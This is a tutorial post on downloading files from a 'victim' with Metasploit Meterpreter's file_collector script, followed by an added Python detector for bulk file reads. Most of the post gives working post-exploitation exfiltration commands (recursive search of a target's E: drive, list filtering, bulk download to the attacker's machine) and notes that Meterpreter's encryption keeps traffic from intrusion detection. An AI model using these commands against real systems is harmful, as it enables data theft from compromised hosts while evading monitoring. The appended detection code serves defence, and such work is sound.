Downloading files from a victim with Metasploit Meterpreter scripts


1) The Meterpreter shell has a lot of neat features, including encryption of all the traffic between our attacking system and the target. This prevents intrusion detection systems (IDS) from intercepting and scanning the data.

2) Downloading individual files:

From the Meterpreter console it is possible to download individual files using the "download" command, which is straightforward if you only want to download one file.
Meterpreter has a lot of useful built-in scripts that make post-exploitation tasks such as data collection easier. To view the options, type "run" followed by a space, then press Tab twice to see the auto-completion options.

Let's look at "run file_collector" first:

3) In the example below, I wanted to copy all the data from the E: drive of a Windows target, with the exception of a couple of directories that I am not interested in.
(In this actual example I am copying some files from a "Teach yourself C for Linux in 21 days" CD which is in the drive on the target system, onto my attacking system ;o)

4) To view the "run file_collector" options, use "-h":

meterpreter > run file_collector -h
Meterpreter Script for searching and downloading files that
match a specific pattern. First save files to a file, edit and
use that same file to download the choosen files.

OPTIONS:

    -d <opt>  Directory to start search on, search will be recursive.
    -f <opt>  Search blobs separated by a |.
    -h        Help menu.
    -i <opt>  Input file with list of files to download, one per line.
    -l <opt>  Location where to save the files.
    -o <opt>  Output File to save the full path of files found.
    -r        Search subdirectories.


meterpreter >

5) As you can see in the description, this is a three-stage process. First, we create a file list, then we remove any files we don't want from the list, then we execute the download process.

6) Creating the file list

run file_collector -r -d e:\\ -f * -o /root/Courses/CforLinux/file.txt

We are running the collector recursively, looking for all files on the E: drive, and storing a list of these files in a "file.txt" file on my attacking system.

🦑 As Meterpreter copies files over an encrypted connection, the data transfer can be slower, so it is best to strip out any unneeded files.

Editing the file list

I don't need some of the directories on the target data drive, so I use grep to remove these, and make a new file "file.lst".

# -F treats each quoted pattern as a literal string, so the backslash is matched too
grep -vF -e '\DDD' -e '\GCC' -e '\GDB' -e '\MAKE' /root/Courses/CforLinux/file.txt > /root/Courses/CforLinux/file.lst

(I am removing the \DDD \GCC \GDB \MAKE directories, which are not particularly relevant to you, just an example. I am chopping two carrots with one knife here, as this was useful to me at the time ;o)

🦑 Downloading the file list

Once we have the edited file list we can simply start the file download process with the following command:

run file_collector -i /root/Courses/CforLinux/file.lst -l /root/Courses/CforLinux/

Written by undercode
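
Seen from the target host, the recursive search and bulk download described above appear as one process opening many files across many directories in a short time. The following Python code is an added example, not part of the original post, that flags this pattern in file-read records; the record layout, process IDs, thresholds and sample events are all constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from pathlib import PureWindowsPath


def sample_events():
    """Constructed records: (timestamp, pid, path opened for read).
    The layout is an assumption, not a real audit-log format."""
    t0 = datetime(2024, 1, 1, 12, 0, 0)
    dirs = ["DDD", "GCC", "GDB", "MAKE", "SRC", "DOCS"]
    # pid 4242 (constructed): one file per second, spread over six directories.
    events = [(t0 + timedelta(seconds=i), 4242,
               str(PureWindowsPath("E:/", dirs[i % 6], f"file{i}.c")))
              for i in range(30)]
    # pid 1337 (constructed): a user opening one file a minute in one directory.
    events += [(t0 + timedelta(minutes=i), 1337,
                str(PureWindowsPath("E:/", "SRC", f"notes{i}.txt")))
               for i in range(5)]
    return events


def find_bulk_readers(events, window=timedelta(seconds=60),
                      min_files=20, min_dirs=4):
    """Return {pid: (files, dirs)} for every process that read at least
    min_files distinct files from at least min_dirs directories within one
    sliding window. Thresholds are assumptions to tune per environment."""
    recent = defaultdict(deque)  # pid -> (timestamp, path) pairs still in window
    flagged = {}
    for ts, pid, path in sorted(events):
        queue = recent[pid]
        queue.append((ts, path.lower()))
        while ts - queue[0][0] > window:
            queue.popleft()
        files = {p for _, p in queue}
        dirs = {str(PureWindowsPath(p).parent) for p in files}
        if len(files) >= min_files and len(dirs) >= min_dirs:
            # Keep the largest burst seen for this process.
            flagged[pid] = max(flagged.get(pid, (0, 0)), (len(files), len(dirs)))
    return flagged


if __name__ == "__main__":
    for pid, (files, dirs) in find_bulk_readers(sample_events()).items():
        print(f"pid {pid}: {files} files from {dirs} directories in one window")
```

Because the check works on file-access metadata on the host, it does not depend on being able to read the encrypted session traffic.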








